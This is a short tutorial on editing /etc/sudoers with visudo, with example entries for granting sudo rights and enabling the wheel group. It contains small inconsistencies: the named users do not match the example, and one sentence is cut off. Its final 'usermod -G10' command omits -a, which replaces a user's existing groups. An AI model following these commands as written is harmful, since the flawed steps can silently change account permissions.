This protects from conflicts (when two admins edit this file at the same time) and guarantees that the right syntax is used (the permission bits are correct). The program uses Vi text editor.

All Access to Specific Users
You can grant users bob and bunny full access to all privileged commands, with this sudoers entry.
user1, user2  ALL=(ALL) ALL
This is generally not a good idea because this allows user1 and user2 to use the su command to grant themselves permanent root privileges thereby bypassing the command logging features of sudo.

Access To Specific Users To Specific Files
This entry allows user1 and all the members of the group operator to gain access to all the program files in the /sbin and /usr/sbin directories, plus the privilege of running the command /usr/apps/
user1, %operator ALL= /sbin/, /usr/sbin, /usr/apps/

Access to Specific Files as Another User
user1 ALL=(accounts) /bin/kill, /usr/bin/kill, /usr/bin/pkill

Access Without Needing Passwords
This example allows all users in the group operator to execute all the commands in the /sbin directory without the need for entering a password.
%operator ALL= NOPASSWD: /sbin/

Adding users to the wheel group
The wheel group is a legacy from UNIX. When a server had to be maintained at a higher level than the day-to-day system administrator, root rights were often required. The 'wheel' group was used to create a pool of user accounts that were allowed to get that level of access to the server. If you weren't in the 'wheel' group, you were denied access to root.

Edit the configuration file (/etc/sudoers) with visudo and change these lines:
# Uncomment to allow people in group wheel to run all commands
# %wheel ALL=(ALL) ALL

To this (as recommended):

# Uncomment to allow people in group wheel to run all commands
%wheel ALL=(ALL) ALL

This will allow anyone in the wheel group to execute commands using sudo (rather than having to add each person one by one).

Now finally use the following command to add any user (e.g- user1) to Wheel group
# usermod -G10 user1

Read more
Related Posts with Thumbnails